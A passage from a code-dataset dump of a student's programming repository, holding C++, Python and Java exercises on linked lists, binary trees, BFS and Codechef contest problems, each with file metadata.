teja\n\"\"\"\n\nn=int(input())\na=[]\nfor i in range(0,n):\n lk,pk=input().split()\n lis=[i+1,int(lk)+int(pk)]\n a.append(lis)\na.sort(key=lambda i:i[1])\nfor i in a:\n print(i[0],end=\" \")\nprint()" }, { "alpha_fraction": 0.5794044733047485, "alphanum_fraction": 0.593052089214325, "avg_line_length": 12.213114738464355, "blob_id": "a2827a0110ad329ea74f2bd2d314b2d6cb4c80f5", "content_id": "c713732533edb95db3323cec43f155f6b0748280", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 806, "license_type": "permissive", "max_line_length": 70, "num_lines": 61, "path": "/C++/nth node in LL.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "//https://www.geeksforgeeks.org/nth-node-from-the-end-of-a-linked-list\n\n#include<bits/stdc++.h>\nusing namespace std;\n\nstruct Node\n{\n\tint data;\n\tstruct Node* next;\n};\n\nvoid printNthfromLast(struct Node* head, int n)\n{\n\tint len = 0, i;\n\tstruct Node* temp = head;\n\t\n\twhile(temp!= NULL)\n\t{\n\t\ttemp = temp->next;\n\t\tlen++;\n\t}\n\t\n\tif(len < n)\n\t{\n\t\treturn;\n\t}\n\ttemp = head;\n\t\n\tfor(i=1;i<len-n+1;i++)\n\t{\n//\t\tcout << temp->data << \" -> \";\n\t\ttemp = temp->next;\n\n\t}\n\tcout << temp->data;\n\treturn;\n\t\n}\n\nvoid push(struct Node** head_ref, int new_data)\n{\n\tstruct Node* new_node = new Node();\n\t\n\tnew_node->data = new_data;\n\tnew_node->next = *head_ref;\n\t*head_ref = new_node;\n}\n\n\n\nint main()\n{\n\tstruct Node* head = NULL;\n\t\n\tpush(&head, 20);\n\tpush(&head, 4);\n\tpush(&head, 15);\n\tpush(&head, 35);\n\t\n\tprintNthfromLast(head, 4);\n}\n" }, { "alpha_fraction": 0.33960995078086853, "alphanum_fraction": 0.373907208442688, "avg_line_length": 13.722772598266602, "blob_id": "8ea4081fabcb79c50220309073f22941ffbf53b6", "content_id": "8737f597a59396dbaee0e3bcba92977f36352a68", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1487, "license_type": "permissive", "max_line_length": 83, "num_lines": 101, "path": "/April Long_2020/Unit GCD - version 1.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nvoid prime(int n, vector<int> &check, vector<vector<int>> & ans, vector<int> &rest)\n{\n\tans[0].push_back(1);\n\tint i, j;\n\tcheck[0] = 0;\n\tcheck[1] = 0;\n\tfor(i=2;i<=n;i++)\n\t{\n\t\tif(check[i] != 0)\n\t\t{\n\t\t\tfor(j=2; i*j <= n;j++)\n\t\t\t{\n\t\t\t\tcheck[i*j] = 0;\n\t\t\t}\t\n\t\t}\n\t}\n\t\n\tfor(i=1;i<=n;i++)\n\t{\n\t\tif(check[i] == 1)\n\t\t{\n//\t\t\tcout << i << \" \";\n\t\t\trest[i] = 0;\n\t\t\tans[0].push_back(i);\n\t\t}\n\t}\n//\tcout << \"\\n\";\n}\n\nint main()\n{\n\tint t, n ,i ,j;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector<int> check(n+1, 1);\n\t\tvector<int> rest(n+1, 1);\n\t\trest[0] = 0;\n\t\trest[1] = 0;\n\t\tvector<vector<int>> ans(10000000);\n\t\tprime(n, check, ans, rest);\n\t\t\n\t\tint k = 1, p, days = 1;\n\t\tfor(i=2;i<=n;i++)\n\t\t{\n//\t\t\tk = 1;\n\t\t\tk = k % days;\n\t\t\tif(check[i] == 1)\n\t\t\t{\n\t\t\t\tfor(j=2; i*j<=n; j++)\n\t\t\t\t{\t\t\t\t\t\n\t\t\t\t\tif(rest[i*j] == 1)\n\t\t\t\t\t{\n\t\t\t\t\t\tfor(p = 0; p<ans[k].size();p++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tif(ans[k][p] % i == 0)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t++k;\n//\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t\tif(i == 2)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t++days;\t\n\t\t\t\t\t\t}\n\t\t\t\t\t\tans[k].push_back(i*j);\n//\t\t\t\t\t\tcout << i*j << \" \";\n\t\t\t\t\t\trest[i*j] = 0;\n\t\t\t\t\t\t++k;\t\n\t\t\t\t\t}\t\t\n\t\t\t\t}\n//\t\t\t\tcout << \"\\n\";\n\t\t\t}\n\t\n\t\t}\t\n\t\t\n\t\tint siz = ans.size();\n//\t\tcout << \"siz = \" << siz << \"\\n\";\n\t\t\n//\t\tcout << \"\\n\\n\\n\";\n\t\tcout << days << \"\\n\";\n\t\tfor(i=0;i<1000001;i++)\n\t\t{\n\t\t\tif(ans[i].size() == 0)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tcout << ans[i].size() << \" \";\n\t\t\tfor(j=0;j<ans[i].size();j++)\n\t\t\t{\n\t\t\t\tcout << ans[i][j] << \" \";\n\t\t\t}\n\t\t\tcout << \"\\n\";\n\t\t}\n\t}\t\n}\n" }, { "alpha_fraction": 0.475382000207901, "alphanum_fraction": 0.4855687618255615, "avg_line_length": 13.13599967956543, "blob_id": "b4421cb6fc5b53d8ecbe8f3233d60a93dd510b06", "content_id": "3666a4ea98d6daae42c8f15bac80ae23e0bd03cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1767, "license_type": "permissive", "max_line_length": 54, "num_lines": 125, "path": "/C++/Linkedlist/Findling loop in LL.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\t\tint data;\n\t\tNode* next;\n\t\tNode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tnext = NULL;\n\t\t}\t\n};\n\nclass Linkedlist\n{\n\tpublic:\n\t\tNode* head;\n\t\tNode* tail;\n\t\tint len;\n\t\tLinkedlist()\n\t\t{\n\t\t\thead = NULL;\n\t\t\ttail = NULL;\n\t\t\tlen = 0;\n\t\t}\n\t\t\n\t\tvoid append(int data)\n\t\t{\n\t\t\tNode* new_node = new Node(data);\n\t\t\tif(len == 0)\n\t\t\t{\n\t\t\t\thead = new_node;\n\t\t\t\ttail = new_node;\n\t\t\t\tnew_node->next = NULL;\n\t\t\t\t++len;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\ttail->next = new_node;\n\t\t\t\ttail = new_node;\n\t\t\t\ttail->next = NULL;\n\t\t\t\t++len;\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid cycle(int n)\n\t\t{\n\t\t\tNode* temphead = head;\n\t\t\tNode* temptail = tail;\n\t\t\tint i = 0;\n\t\t\tfor(i=0;i<len-n;i++)\n\t\t\t{\n\t\t\t\ttemphead = temphead->next;\n\t\t\t}\n\t\t\tcout << \"cycle meet \" << temphead->data << \"\\n\";\n\t\t\ttail->next = temphead;\n\t\t}\n\t\t\n\t\tvoid printlist()\n\t\t{\n\t\t\tint val = 0;\n\t\t\tNode* temp = head;\n\t\t\twhile(temp->next != NULL)\n\t\t\t{\n\t\t\t\tif(val < 9)\n\t\t\t\t{\n\t\t\t\t\tcout << temp->data << \" -> \";\n\t\t\t\t\ttemp = temp->next;\t\n\t\t\t\t\t++val;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\treturn ;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid hareTortoise()\n\t\t{\n\t\t\tNode* hare = head;\n\t\t\tNode* tort = head;\n\t\t\tif(hare->next != NULL)\n\t\t\t{\n\t\t\t\thare = hare->next->next;\n\t\t\t\ttort = tort->next;\n\t\t\t}\n\t\t\tint flag = 0;\n\t\t\twhile(hare != tort)\n\t\t\t{\n\t\t\t\tif(hare->next != NULL && hare->next->next != NULL)\n\t\t\t\t{\n\t\t\t\t\thare = hare->next->next;\n\t\t\t\t\ttort = tort->next;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcout << \"No cycle!\" << \"\\n\";\n\t\t\t\t\tflag = 1;\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t} \n\t\t\tif(flag == 0){\n\t\t\t\tcout << \"Loop exists\";\n\t\t\t}\n\t\t}\n};\n\nint main()\n{\n\tLinkedlist* ll = new Linkedlist();\n\tll->append(2);\n\tll->append(3);\n\tll->append(4);\n\tll->append(5);\n\tll->append(6);\n\tll->append(7);\n\tll->append(8);\n\tll->append(9);\n\t\n//\tll->cycle(4);\n\tll->printlist();\n\tll->hareTortoise();\n}\n" }, { "alpha_fraction": 0.44517338275909424, "alphanum_fraction": 0.4695407748222351, "avg_line_length": 19.269229888916016, "blob_id": "7eb13a047dc0a4c92faf40ff55fa82220d9d439d", "content_id": "d8cbe694f9fffa38710ca354150d0ae8d5ec37bb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1067, "license_type": "permissive", "max_line_length": 42, "num_lines": 52, "path": "/openlab_coding_preperation/optimized_LL.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:25:17 2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LinkedList:\n \n def __init__(self, data):\n self.head = Node(data)\n \n def attachNode(self, data):\n node = Node(data)\n node.next = self.head\n self.head = node\n \n def attachBack(self, data):\n node = Node(data)\n temp = self.head\n while(temp.next!=None):\n temp = temp.next\n temp.next = node\n \n \n def printLL(self):\n temp = self.head\n while(temp):\n print(temp.data, end = \" -> \")\n temp = temp.next\n\nif __name__ == '__main__':\n l = [1, 2, 3, 4, 5]\n llist = LinkedList(l[0])\n for i in range(1, len(l)):\n llist.attachNode(l[i])\n \n llist.printLL()\n \n print()\n \n l = [1, 2, 3, 4, 5]\n llist = LinkedList(l[0])\n for i in range(1, len(l)):\n llist.attachBack(l[i])\n \n llist.printLL()\n \n " }, { "alpha_fraction": 0.5695364475250244, "alphanum_fraction": 0.5854304432868958, "avg_line_length": 14.729166984558105, "blob_id": "1896f26333ce1110f7df86578f662c6a451512b5", "content_id": "144206237ff4c656f7c5db06f334bf60066741f6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 755, "license_type": "permissive", "max_line_length": 58, "num_lines": 48, "path": "/C++/yartin.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<cmath>\nusing namespace std;\nstruct bst{\n\tint data;\n\tbst *left;\n\tbst *right;\n};\nbst* insert(bst *root, int x){\n\t\tif(root==0){\n\t\tbst *root=new bst();\n\t\troot->data=x;\n\t\troot->left=root->right=0;\n\t\treturn root;\n\t}\n\tif(x<=root->data)\n\t\troot->left=insert(root->left,x);\n\telse if(x>root->data)\n\t\troot->right=insert(root->right,x);\n\treturn root;\n}\n\nint max_kill(bst *root){\n\tif(root==0)\n\t\treturn -1;\n\treturn max(max_kill(root->left),max_kill(root->right))+1;\n}\nint main(){\n\tint t,n,x;\n\tcin>>t;\n\tfor(int j=1; j<=t; j++){\n\t\tcin>>n;\n\t\tbst *root=0;\n\t\tfor(int i=1; i<=n; i++)\n\t\t{\n\t\t\tcin>>x;\n\t\t\troot=insert(root,x);\n\t\t}\n\t\t\t\t\n\t\tint result=max_kill(root)+1;\n\t\tif(result==-1)\n\t\t\tcout<<\"0\";\n\t\telse\n\t\t\tcout<<result;\n\t\tcout<<endl;\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.45890411734580994, "alphanum_fraction": 0.4771689474582672, "avg_line_length": 18.46666717529297, "blob_id": "458c4727ab78632ad5384559d5c9dec44f06229c", "content_id": "3fd662448f00aab0ac10ab9e9fd15a42a89fd271", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 876, "license_type": "permissive", "max_line_length": 60, "num_lines": 45, "path": "/python/HPOJ/BST.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 6 11:46:41 2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, key):\n self.left = None\n self.right = None\n self.val = key\n \ndef insert(root, node):\n if root is None:\n root = node\n else:\n if root.val > node.val:\n if root.left == None:\n root.left = node\n \n else:\n insert(root.left, node)\n else:\n if root.right == None:\n root.right = node\n \n else:\n insert(root.right, node)\n\n\ndef height(node):\n if node == None:\n return 0\n else:\n return 1 + max(height(node.left), height(node.right))\n\n\nn = int(input())\nl = list(map(int,input().split()))\nr = Node(int(l[0]))\nfor i in range(1, n):\n insert(r, Node(int(l[i])))\n\nprint(height(r))\n" }, { "alpha_fraction": 0.3612637221813202, "alphanum_fraction": 0.3811813294887543, "avg_line_length": 17.653846740722656, "blob_id": "4c0f6c61bf08308799973a7db61380e22f03910d", "content_id": "d6af85b36c5135fffbf31e6cef94f403059c66b4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1456, "license_type": "permissive", "max_line_length": 81, "num_lines": 78, "path": "/C++/Laser_Everywhere.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nstruct Test\n{\n\tint x, y, z;\n};\n\nint main()\n{\n\tint t, n, m;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n >> m;\n\t\tint i;\n\t\tvector < int > pts(n+1);\n\t\tfor(i=1;i<=n;i++)\n\t\t{\n\t\t\tcin >> pts[i];\n\t\t}\n\t\t\n\t\tvector< Test > coord(n);\n\t\tint a, b, c;\n\t\tfor(i=1;i<n;i++)\n\t\t{\n\t\t\ta = pts[i+1] - pts[i];\n\t\t\tb = i - i - 1;\n\t\t\tc = -1 * (a * i + b * pts[i]);\n\t\t\tcoord[i] = {a, b, c};\n\t\t}\n//\t\tfor(i=1;i<n;i++)\n//\t\t{\n//\t\t\tcout << coord[i].x << \" \" << coord[i].y << \" \" << coord[i].z << \"\\n\";\n//\t\t}\n\t\t\n\t\tint count = 0, x1, x2, y;\n\t\tfloat poix, poiy;\n\t\twhile(m--)\n\t\t{\n\t\t\tunordered_map <int, int>map;\n\t\t\tint ans = 0;\n\t\t\tcount = 0;\n\t\t\tcin >> x1 >> x2 >> y;\n\t\t\tfor(i=1;i<n;i++)\n\t\t\t{\n\t\t\t\ta = 0;\n\t\t\t\tb = x1 - x2;\n\t\t\t\tc = -1 * (a * x1 + b * y);\n\t\t\t\t\n\t\t\t\tpoix = (coord[i].y * c - b * coord[i].z) / (coord[i].x * b - a * coord[i].y);\n\t\t\t\tpoiy = (coord[i].z * a - c * coord[i].x) / (coord[i].x * b - a * coord[i].y);\n\t\t\t\tcout << fixed << setprecision(5) << \"poix = \" << poix << \"\\n\";\n\t\t\t\tcout << fixed << setprecision(5) << \"poiy = \" << poiy << \"\\n\";\n\n\t\t\t\tif((poix >= i && poix <= i+1) || (poiy >= pts[i] && poiy <= pts[i+1]))\n\t\t\t\t{\n\t\t\t\t\tif((x2 == i && y == pts[i]) || (x1 == i+1 && y == pts[i+1]))\n\t\t\t\t\t{\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t\tif(map[poix] == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tmap[poix] = poiy;\n//\t\t\t\t\t\tcout << \"POI = (\" << poix << \", \" << poiy << \")\\n\"; \n\t\t\t\t\t\t++ans;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tcout << ans << \"\\n\";\n\t\t}\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.4330900311470032, "alphanum_fraction": 0.4476885497570038, "avg_line_length": 10.771428108215332, "blob_id": "10e8087c4fd519ffd4d220ae5fa2d50932da51b3", "content_id": "735436ea79ca3b642860eedb2beeb20a3fe09c59", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 411, "license_type": "permissive", "max_line_length": 30, "num_lines": 35, "path": "/C++/CHNUM.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tint t,n,i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\tcin >> n;\n\tvector< long long > arr(n);\n\tlong long pos = 0 , neg = 0;\n\tfor(i=0; i<n ;i++)\n\t{\n\t\tcin >> arr[i];\n\t\tif(arr[i] > 0)\n\t\t{\n\t\t\t++pos;\n\t\t}\n\t\telse\n\t\t{\n\t\t\t++neg;\n\t\t}\n\t}\n\tcout << max(pos, neg) << \" \";\n\tif(pos==0 || neg == 0)\n\t{\n\t\tcout << max(pos, neg);\n\t}\n\telse\n\t{\n\t\tcout << min(pos, neg);\n\t}\n\tcout << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.44262295961380005, "alphanum_fraction": 0.4601873457431793, "avg_line_length": 21.473684310913086, "blob_id": "d592f1e6da5789db143cc3a37fd2a73b1a59768c", "content_id": "130ccd34ea72a26ae97afd86ed75f4e307a84709", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 854, "license_type": "permissive", "max_line_length": 55, "num_lines": 38, "path": "/openlab_coding_preperation/Construct_BinaryTree_from_LevelOrderList.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n \ndef insertLevelOrder(arr, root, i, n): \n \n if i < n: \n temp = Node(arr[i]) \n root = temp \n \n root.left = insertLevelOrder(arr, root.left, \n 2 * i + 1, n) \n \n root.right = insertLevelOrder(arr, root.right, \n 2 * i + 2, n) \n return root \n\ndef inOrder(root): \n if root != None: \n inOrder(root.left) \n print(root.data,end=\" \") \n inOrder(root.right) \n\nif __name__ == '__main__':\n l = [1, 2, 3, 4, 5, 6, 6, 6, 6]\n n = len(l)\n root = None\n root = insertLevelOrder(l, root, 0, n) \n inOrder(root)\n" }, { "alpha_fraction": 0.40512821078300476, "alphanum_fraction": 0.4205128252506256, "avg_line_length": 17.25, "blob_id": "db498f7eccb9cf475403b0855fa1b389433bb11f", "content_id": "04b344ee777f32e436df9851383db5f7db12ca58", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 585, "license_type": "permissive", "max_line_length": 67, "num_lines": 32, "path": "/Java/EID.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nclass Codechef\n{\n\tpublic static void main (String[] args) throws java.lang.Exception\n\t{\n\t\tint t,min,n,i,sum = 0;\n\t\tScanner sc = new Scanner(System.in);\n\t\tt = sc.nextInt();\n\t\twhile(t--!=0)\n\t\t{\n\t \t \n\t\t n = sc.nextInt();\n\t\t int[] a = new int[n];\n\t for(i=0;i<n;i++)\n\t \t{\n\t\t a[i] = sc.nextInt();\n\t\t sum+=a[i];\n\t\t }\n\t \tArrays.sort(a);\n\t\t\tmin = (a[1]-a[0]);\n\t\t for(i=1;i<=n-2;i++)\n\t {\n\t\t if(min > (a[i+1]-a[i]))\n\t\t {\n\t\t min = (a[i+1]-a[i]);\n\t\t }\n\t }\n\t System.out.println(min);\n\t }\n\t \n\t}\n}\n" }, { "alpha_fraction": 0.3424878716468811, "alphanum_fraction": 0.368336021900177, "avg_line_length": 11.117647171020508, "blob_id": "95ff96834d2ee16851a65284d2985c4a6584a11f", "content_id": "556ae2bc78484c897d80e390e123b1d1fd8c2475", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 619, "license_type": "permissive", "max_line_length": 36, "num_lines": 51, "path": "/April Long_2020/COVID Pandemic and Long Queue.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint count = 0, flag = 0;\n\t\tcin >> n;\n\t\tint temp = 0, y = 0;\n\t\tvector< int >vec(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> vec[i];\n\t\t}\n\t\tfor(i=0;i<n;i++)\n\t\t{\n//\t\t\tcin >> temp;\n\t\t\tif(flag == 0 && vec[i] == 1)\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t}\n\t\t\telse if(flag == 1 && vec[i] == 1)\n\t\t\t{\n\t\t\t\tif(count < 5)\n\t\t\t\t{\n\t\t\t\t\ty = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcount = 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(flag == 1 && vec[i] == 0)\n\t\t\t{\n\t\t\t\t++count;\n\t\t\t}\n\t\t}\t\t\n\t\tif(y)\n\t\t{\n\t\t\tcout << \"NO\" << \"\\n\";\n\t\t}\n\t\telse\n\t\t{\n\t\t\tcout << \"YES\" << \"\\n\";\n\t\t}\n\t}\n}\n\n" }, { "alpha_fraction": 0.5784313678741455, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 11.75, "blob_id": "694ca38140be2098e3eea09801a177da9d4f3eae", "content_id": "65625bfcc11ae6cbe546dbadc3ba5c93646f93e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 102, "license_type": "permissive", "max_line_length": 23, "num_lines": 8, "path": "/C++/pointer.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tchar *con = \"Geeks\";\n\tcout << *(con+1);\n}\n" }, { "alpha_fraction": 0.518193244934082, "alphanum_fraction": 0.5232120156288147, "avg_line_length": 10.880597114562988, "blob_id": "d1ec3fdaac6525174263d359bce46f9138858611", "content_id": "6218f6ff9522c5e454c849779f90f513975705a7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 797, "license_type": "permissive", "max_line_length": 55, "num_lines": 67, "path": "/C++/tree/BFS.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass node\n{\n\tpublic:\n\t\tint data;\n\t\tnode* left;\n\t\tnode* right;\n\t\tnode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tleft = NULL;\n\t\t\tright = NULL;\n\t\t}\n};\n\nnode* newnode(int data)\n{\n\tnode* newnode = new node(data);\n\treturn newnode;\n}\n\nvoid BFS(node* root)\n{\n\tif(root == NULL)\n\t{\n\t\tcout << 0;\n\t}\n\t\n\tqueue<node*>q;\n\tq.push(root);\n\t\n\twhile(!q.empty())\n\t{\n\t\tint siz = q.size();\n\t\t\n//\t\twhile(siz--) This runs with or without while loop\t\n//\t\t{\n\t\t\tnode* val = q.front();\n\t\t\tq.pop();\n\t\t\t\n\t\t\tcout << val->data << \" \";\n\t\t\tif(val->left != NULL)\n\t\t\t{\n\t\t\t\tq.push(val->left);\n\t\t\t}\n\t\t\t\n\t\t\tif(val->right != NULL)\n\t\t\t{\n\t\t\t\tq.push(val->right);\n\t\t\t}\n\t\t\t\n//\t\t}\n\t}\n\t\n\t\n}\n\nint main()\n{\n\tnode* root = newnode(3);\n\troot->left = newnode(2);\n\troot->right = newnode(1);\n\tBFS(root);\n\n}\n\n" }, { "alpha_fraction": 0.5131579041481018, "alphanum_fraction": 0.5394737124443054, "avg_line_length": 14.199999809265137, "blob_id": "610edaf338db597c8d950fb8f888108bff8496be", "content_id": "2786407ff6a839bf7a4a3e0e2280d86e39e725e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 304, "license_type": "permissive", "max_line_length": 41, "num_lines": 20, "path": "/Java/HS08TEST.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "import java.util.*;\n \nclass bank {\n \n\tpublic static void main(String[] args) {\n\t\t\n\t\t\n\t\tfloat x,y;\n\t\tScanner sc = new Scanner(System.in);\n\t\t\n \n\t\tx =sc.nextFloat();\n\t\ty=sc.nextFloat();\n\t\n\t\tif(x%5!=0 || (x+0.50)>y)\n\t\t\tSystem.out.printf(\"%f\", y);\n\t\telse {\n\t\t\ty-=(x+0.50);\n\t\t\tSystem.out.printf(\"%f\", y);}\n\t}} " }, { "alpha_fraction": 0.3353884220123291, "alphanum_fraction": 0.3637484610080719, "avg_line_length": 12.096774101257324, "blob_id": "fe1f4b04cc21862251fd5ffe1c148cf0849827db", "content_id": "bab735ecd730c7d818fc2caf8d4cf679b67f69d4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 811, "license_type": "permissive", "max_line_length": 51, "num_lines": 62, "path": "/C++/CFMM.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tint t,n,i,j;\n\tstring s;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tvector< int >a(6,0);\n\t\tint cc =0, co = 0, cd = 0, ce = 0, ch = 0,cf = 0;\n\t\tcin >> n;\n\t\tfor(j=0;j<n;j++)\n\t\t{\n\t\t\tcin >> s;\n\t\t\tfor(i=0;i<s.size();i++)\n\t\t\t{\n\t\t\t\tswitch(s[i])\n\t\t\t\t{\n\t\t\t\t\tcase 'c':\n\t\t\t\t\t\t++cc;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\n\t\t\t\t\tcase 'o':\n\t\t\t\t\t\t++co;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tcase 'd':\n\t\t\t\t\t\t\t++cd;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\n\t\t\t\t\tcase 'e':\n\t\t\t\t\t\t\t++ce;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\n\t\t\t\t\tcase 'h':\n\t\t\t\t\t\t\t++ch;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'f':\n\t\t\t\t\t\t++cf;\n\t\t\t\t\t\tbreak;\t\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\ta[0] = cc;\n\t\ta[1] = co;\n\t\ta[2] = cd;\n\t\ta[3] = ce;\n\t\ta[4] = ch;\n\t\ta[5] = cf;\n\t\ta[0] = a[0]/2;\n\t\ta[3] = a[3]/2;\n\t\tsort(a.begin(),a.end());\n\t\tcout << a[0] << \"\\n\";\n\t\t\n\t}\n}" }, { "alpha_fraction": 0.4882400631904602, "alphanum_fraction": 0.4971613883972168, "avg_line_length": 12.106383323669434, "blob_id": "599acc803980b379cc2d8260027ba4eb25aaf5e7", "content_id": "81c6fd8cf85d788f824b71e71fba88cd8c27f487", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1233, "license_type": "permissive", "max_line_length": 45, "num_lines": 94, "path": "/C++/Linkedlist/full linkedlist.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* next;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tnext = NULL;\n\t}\n};\n\nclass Linkedlist\n{\n\tpublic:\n\t\tNode* head;\n\t\tNode* tail;\n\t\tint len;\n\t\tLinkedlist()\n\t\t{\n\t\t\thead = NULL;\n\t\t\ttail = NULL;\n\t\t\tlen = 0;\n\t\t}\n\t\t\n\t\tvoid push(int data)\n\t\t{\n\t\t\tNode* new_node = new Node(data);\n\t\t\tnew_node->next = head;\n\t\t\thead = new_node;\n\t\t\t++len;\n\t\t}\n\t\n\t\tvoid append(int data)\n\t\t{\n\t\t\tNode* new_node = new Node(data);\n\t\t\tif(len == 0)\n\t\t\t{\n\t\t\t\thead = new_node;\n\t\t\t\ttail = new_node;\n\t\t\t\thead->next = NULL;\n\t\t\t\t++len;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\ttail->next = new_node;\n\t\t\t\tnew_node->next = NULL;\n\t\t\t\ttail = new_node;\n\t\t\t\t++len;\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid printlist()\n\t\t{\n\t\t\tNode* temp = head;\n\t\t\twhile(temp != NULL)\n\t\t\t{\n\t\t\t\tcout << temp->data << \" -> \";\n\t\t\t\ttemp = temp->next;\n\t\t\t}\n\t\t\tcout << \"\\n\";\n\t\t}\n};\n\nint main()\n{\n\tLinkedlist* li = new Linkedlist();\n\tchar c;\n\tcout << \"a - append at the back \" << \"\\n\";\n\tcout << \"p - push from the front \" << \"\\n\"; \n\tcin >> c;\n\tif(c == 